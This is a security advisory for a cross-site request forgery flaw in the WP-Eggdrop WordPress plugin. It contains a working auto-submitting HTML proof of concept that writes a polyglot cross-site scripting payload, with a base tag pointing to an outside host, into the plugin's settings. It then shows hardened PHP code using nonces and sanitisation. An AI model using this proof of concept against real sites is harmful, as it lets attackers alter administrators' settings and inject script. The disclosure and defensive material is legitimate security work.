Description
The WP-Eggdrop plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1. This is due to missing or incorrect nonce validation on the wpegg_updateOptions() function. This makes it possible for unauthenticated attackers to update the plugin’s settings via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
Severity
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Version
<= 0.1
PoC:
<html>
<!-- eneriiiiiii -->
<body>
<form action="http://[ASSETS]/wp-admin/options-general.php?page=wpegg" method="POST">
<input type="hidden" name="wpegg_server" value="JavaScript://%0A/*?'/*\\'/*"/*\\"/*`/*\\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1331+6)}//><Base/Href=//ener1-s3c.github.io/\\76-->" />
<input type="hidden" name="wpegg_port" value="666" />
<input type="hidden" name="wpegg_password" value="JavaScript://%0A/*?'/*\\'/*"/*\\"/*`/*\\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1331+6)}//><Base/Href=//ener1-s3c.github.io/\\76-->" />
<input type="hidden" name="wpegg_message" value="JavaScript://%0A/*?'/*\\'/*"/*\\"/*`/*\\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1331+6)}//><Base/Href=//ener1-s3c.github.io/\\76-->" />
<input type="hidden" name="wpegg_submit" value="Update Options »" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
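The root cause named above is a settings handler that trusts any POST carrying the expected field names. The following is an added example, not the WP-Eggdrop plugin's own code, of what a hardened version of such a handler looks like in WordPress: it binds the form to a nonce with wp_nonce_field(), verifies it with check_admin_referer(), enforces the manage_options capability, and validates each field before storing it. The field and option names (wpegg_server, wpegg_port, wpegg_password, wpegg_message, wpegg_submit) mirror the form fields in the PoC; the function names, the nonce action name and the option keys are assumptions for illustration.

```php
<?php
// Added example (not the WP-Eggdrop plugin's code): a CSRF-hardened
// settings page and update handler. Function names, the nonce action
// 'wpegg_update_options' and the option keys are hypothetical.

// Renders the settings form. The nonce field ties this form to one
// specific action, so a form served from another origin cannot carry
// a valid token for it.
function wpegg_example_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wp-eggdrop' ) );
    }
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=wpegg' ) ); ?>">
        <?php wp_nonce_field( 'wpegg_update_options', 'wpegg_nonce' ); ?>
        <input type="text" name="wpegg_server"
               value="<?php echo esc_attr( get_option( 'wpegg_server', '' ) ); ?>" />
        <input type="number" name="wpegg_port" min="1" max="65535"
               value="<?php echo esc_attr( get_option( 'wpegg_port', '' ) ); ?>" />
        <input type="password" name="wpegg_password" value="" />
        <input type="text" name="wpegg_message"
               value="<?php echo esc_attr( get_option( 'wpegg_message', '' ) ); ?>" />
        <?php submit_button( 'Update Options', 'primary', 'wpegg_submit' ); ?>
    </form>
    <?php
}

// Processes the submitted form. Order matters: authorization first,
// then the CSRF check, then type-aware validation of every field.
function wpegg_example_update_options() {
    if ( ! isset( $_POST['wpegg_submit'] ) ) {
        return;
    }

    // Authorization: only users allowed to manage options may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wp-eggdrop' ) );
    }

    // CSRF defence: the token must have been issued for this exact action.
    // check_admin_referer() stops execution if the nonce is missing or stale.
    check_admin_referer( 'wpegg_update_options', 'wpegg_nonce' );

    // Never persist raw request input; coerce each field to its expected type.
    $server   = isset( $_POST['wpegg_server'] )   ? sanitize_text_field( wp_unslash( $_POST['wpegg_server'] ) )   : '';
    $port     = isset( $_POST['wpegg_port'] )     ? absint( $_POST['wpegg_port'] )                                : 0;
    $password = isset( $_POST['wpegg_password'] ) ? sanitize_text_field( wp_unslash( $_POST['wpegg_password'] ) ) : '';
    $message  = isset( $_POST['wpegg_message'] )  ? sanitize_text_field( wp_unslash( $_POST['wpegg_message'] ) )  : '';

    if ( $port < 1 || $port > 65535 ) {
        wp_die( esc_html__( 'Invalid port number.', 'wp-eggdrop' ) );
    }

    update_option( 'wpegg_server', $server );
    update_option( 'wpegg_port', $port );
    if ( '' !== $password ) {
        // An empty password field means "leave the stored value unchanged".
        update_option( 'wpegg_password', $password );
    }
    update_option( 'wpegg_message', $message );
}
add_action( 'admin_init', 'wpegg_example_update_options' );
```

Two design points worth noting. A capability check on its own does not stop CSRF, because the forged request is sent by the administrator's own browser with their cookies; the nonce is what proves the request originated from a form this site served to that user. And because stored settings are echoed back into the admin page, the render function escapes every value with esc_attr(), so whatever the handler accepts is displayed as text rather than interpreted as markup.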
References
- https://plugins.trac.wordpress.org/browser/wp-eggdrop/trunk/wp-eggdrop.php#L215
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-eggdrop/wp-eggdrop-01-cross-site-request-forgery-to-settings-update
- https://www.cve.org/CVERecord?id=CVE-2024-2969